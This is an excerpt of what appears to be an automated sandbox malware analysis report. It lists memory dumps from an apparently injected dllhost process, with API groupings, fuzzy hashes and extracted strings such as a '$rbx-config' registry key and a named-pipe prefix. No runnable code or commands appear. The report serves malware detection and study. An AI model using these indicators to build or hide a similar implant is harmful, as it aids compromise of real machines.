                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                              • String ID: CONOUT$
                              • API String ID: 3230265001-3130406586
                              • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction ID: 5d0fabf62a07252250c52fe6c1d7acd9e4f52e1651ce7530251a45ce61e4b5ca
                              • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction Fuzzy Hash: 83119321310F5086E760DBD2EC5871966B0F7A8BE7F444215EA5DC7B94CF38C955C748
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                              • String ID: CONOUT$
                              • API String ID: 3230265001-3130406586
                              • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction ID: ef4b6b13b7fb8c502b36630a37dc8b04f1ed3bc9eae145cab425049416f05ab8
                              • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction Fuzzy Hash: 03116035310F6086E7608B92ED58719AAA0F7A8BE7F544216FA5EC7B94CF38C444C748
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Delete$CloseEnumOpen
                              • String ID: SOFTWARE\$rbx-config
                              • API String ID: 3013565938-3990243012
                              • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                              • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                              • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                              • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Thread$Current$Context
                              • String ID:
                              • API String ID: 1666949209-0
                              • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction ID: d4495617840bf4ef7d3530d228c75b83b900e158ced1c8eae1bc07a6532ebb34
                              • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction Fuzzy Hash: 3BD19D36208F9885DE70DB5AE8A835A77B0F798B86F100116EA8D87775DF3DC552CB04
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Thread$Current$Context
                              • String ID:
                              • API String ID: 1666949209-0
                              • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction ID: 9fa46aef5a3546e36e445dd9fcf37bfed42517b05e1b190a597de4546402388c
                              • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction Fuzzy Hash: 68D19D76215FA881DA70DB4AE99835AB7A0F7D8B8AF100116EACD87765CF3CC591CB04
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Free$CurrentThread
                              • String ID:
                              • API String ID: 564911740-0
                              • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction ID: f7d47dcced0f682302553882f79a5782f2e5910e04511fc0c2019939754a7b76
                              • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction Fuzzy Hash: EE510934201F6585EF25EBA4DC682A823A2FB64747F804817E52DC73A5EF79C52BC348
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Free$CurrentThread
                              • String ID:
                              • API String ID: 564911740-0
                              • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction ID: 552cd986716dc2360bbd0bfb5cd554ecba3bb90b827f61cc2ba0a69a9b7620db
                              • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction Fuzzy Hash: AA510735201F6685EB25DBA4DE583A8A3A1FF24747F804817F52D833A9EF78C598C348
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID: $rbx-
                              • API String ID: 756756679-3661604363
                              • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction ID: 05a7fb13811c9c93b491c5fc603bcdb2946da1d33d73974d70d63c59ae98ca77
                              • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction Fuzzy Hash: B4319121701F6192EA35DFA6ED5836AA7A0FF64B87F0880229F4887B55EF35C462C704
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID: $rbx-
                              • API String ID: 756756679-3661604363
                              • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction ID: a485d9dc14f501bfd9719000ed9171ef53dcb96f205bc148da16bfbfe82da6f7
                              • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction Fuzzy Hash: 73318221701F6182E721DFA6DE48669A3A4BF64B87F049022EF5887755EF34E4A1CB08
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: ErrorLast$Value$FreeHeap
                              • String ID:
                              • API String ID: 365477584-0
                              • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction ID: 9934a0b1038e0e1e9f223560c3f50238ac89a25dd2486ef70e09daa121a04795
                              • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction Fuzzy Hash: C7113025300F7052FE74EBF56C2D3AA5152ABA47A3F544626E866D73CADE39C403C348
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: ErrorLast$Value$FreeHeap
                              • String ID:
                              • API String ID: 365477584-0
                              • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction ID: ece7337109bbadf03801841b83c505349a16c698621d59818f8e017e123bdac0
                              • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction Fuzzy Hash: F1114221600EB142F634A7F1AE1D36E9151BFA47A3F544627F966D63C6CE38D481C30C
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID:
                              • API String ID: 517849248-0
                              • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction ID: 04e43806734fe15de06808428a7c989495e73ebb507d9f8212fe42b965858533
                              • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction Fuzzy Hash: 1F015B31700F50C6EA20EB52A85835963A1FB98FD2F884036DE5D83754DE38C586C744
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID:
                              • API String ID: 517849248-0
                              • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction ID: 4c402226a9590750ec87af66d6d000f4ab80615fa1bfb99ac3034134f7ec2a32
                              • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction Fuzzy Hash: B3015B21700E5082EA20DB92E958759A3A1FB98FC2F494036EF5D83754DE38C589C744
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                              • String ID:
                              • API String ID: 449555515-0
                              • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction ID: 641470d16f68c19e2d82bae23d9ca82b48d5204da13c93edf8603a2950fb538d
                              • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction Fuzzy Hash: 98011B65211F60C6EB34EBA1EC5C72962B0BFA5B57F040026C94D87764EF3DC45ACB08
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                              • String ID:
                              • API String ID: 449555515-0
                              • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction ID: 0695c836124f3e3d4d379e0a2543f612936755f36863678de2532ec0f44f88e4
                              • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction Fuzzy Hash: 38011B75611F50C2EB34DBA1ED4C715A2A0BB65B47F04002AEA4D873A4EF3DC488C708
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: FinalHandleNamePathlstrlen
                              • String ID: \\?\
                              • API String ID: 2719912262-4282027825
                              • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                              • Instruction ID: a9d95906869f7ddc41ba09c08d509079ec6be9b979eec37ce0dc4d9d50ef4695
                              • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                              • Instruction Fuzzy Hash: 55F08132304F95D2EB30DB64E8983596370F764B8BFC440229A4983654DE7CC64ACB04
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: FinalHandleNamePathlstrlen
                              • String ID: \\?\
                              • API String ID: 2719912262-4282027825
                              • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                              • Instruction ID: bc9cf7b7948986a81fa55254aaf6f582f6236ce3a87e73a2003b49c7be58f10d
                              • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                              • Instruction Fuzzy Hash: 22F0A462314A9492EB30CB64FE88359E360F764B8BF844022FB4982954DE7CC698C708
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: CombinePath
                              • String ID: \\.\pipe\
                              • API String ID: 3422762182-91387939
                              • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                              • Instruction ID: 8806cf99a071f362793b02f797e9d5d22f34af4a36c54536461c0e2dd4e89e36
                              • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                              • Instruction Fuzzy Hash: 36F05E64704FA0C2EE24EB92BD281196261BB58FC3F448032EE5A87B19CE38C446C708
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction ID: 1ecb0b4b01f3dea65e6482445bf5a479574b8f3dbf29905c01b3ddb7e9e7e446
                              • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction Fuzzy Hash: 79F09661300F1185EE34DB949C583692330EB597A3F54071ADA69C63F4DF3DC44AC308
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: CombinePath
                              • String ID: \\.\pipe\
                              • API String ID: 3422762182-91387939
                              • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                              • Instruction ID: 5cda55a371e1d5876e944b12d0f19c96807f0b77f3b9137c389c69cebaeae176
                              • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                              • Instruction Fuzzy Hash: F4F05E64704FA0C2EA248B96FE18119E661FB68FC3F449032FE5A87B18CE38C449C708
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction ID: e4dc16f572de32b697362fca7f386bcb099319e77dd18cd3dd70c7a68d8abb8c
                              • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction Fuzzy Hash: 4BF09061211E6181EA34CBA4ED8D369A330FBA9763F54031BFA6A851E4DF3CC489C308
                              APIs
